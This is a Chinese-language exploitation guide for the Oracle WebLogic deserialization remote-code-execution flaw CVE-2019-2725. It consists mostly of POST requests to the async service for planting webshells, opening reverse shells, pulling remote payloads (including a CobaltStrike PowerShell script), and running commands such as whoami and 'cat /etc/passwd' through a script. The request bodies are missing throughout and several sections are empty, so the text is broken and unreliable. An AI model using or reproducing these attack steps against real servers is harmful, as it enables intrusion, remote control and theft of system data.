(CVE-2019-2725)(CNVD-C-2019-48814)
======================================
一、漏洞简介
————
二、漏洞影响
————
Oracle WebLogic Server 10.x
Oracle WebLogic Server 12.1.3
三、复现过程
————
访问
(CNVD-C-2019-48814)Weblogic反序列化远程代码执行漏洞/media/rId25.shtml)
若出现以上情况,则有可能会存在漏洞。
### Win/Linux 通用写入shell代码(一)
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1142
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
执行完之后访问
http://www.0-sec.org/_async/webshell.jsp?pwd=123&cmd=whoami
### Win/Linux 通用写入shell代码(二)
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1136
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
执行完之后访问
http://www.0-sec.org/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami
> (注:上述报文中servers/AdminServer/tmp/\_WL\_internal/bea\_wls9\_async\_response/8tpkys/war/,servers/AdminServer/tmp/\_WL\_internal/bea\_wls\_internal/9j4dqk/war/
> 均为默认路径,如果路径修改,可以配合反弹shell进行获取)
### Linux
– 反弹shell
“`{=html}
“`
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 853
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
– 写入webshell(需要公网) //这里提供两个代码
> 需要自己在公网上放置一个webshell.txt
>
> webshell地址:
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
– 写入webshell(无需公网) //这里提供两个代码
“`{=html}
“`
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.50.219:7001
Content-Length: 1378
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
> 写入的webshell地址为:
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.50.219:7001
Content-Length: 1376
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
> 写入的webshell地址为:
### Win
– 反弹shell
> 可直接使用CobaltStrike生成一个payload.ps1
> powershell脚本,将该脚本放到公网上,然后使用如下报文即可
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
– 写入webshell(需要公网) //这里提供两个代码
> 需要自己在公网上放置一个webshell.txt
>
> webshell地址为:
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
– 写入webshell (无需公网) //这里提供四个代码
#### 前两组代码
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1367
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 913
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
> 这两组代码的webshell地址为:
#### 后两组代码
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1367
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 913
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
> 这两组代码的webshell地址为:
### 自动化脚本
cve2019-2725_weblogic_rce.bat http://192.168.31.5:7001 “cat /etc/passwd”
参考链接
——–
>













请登录后查看评论内容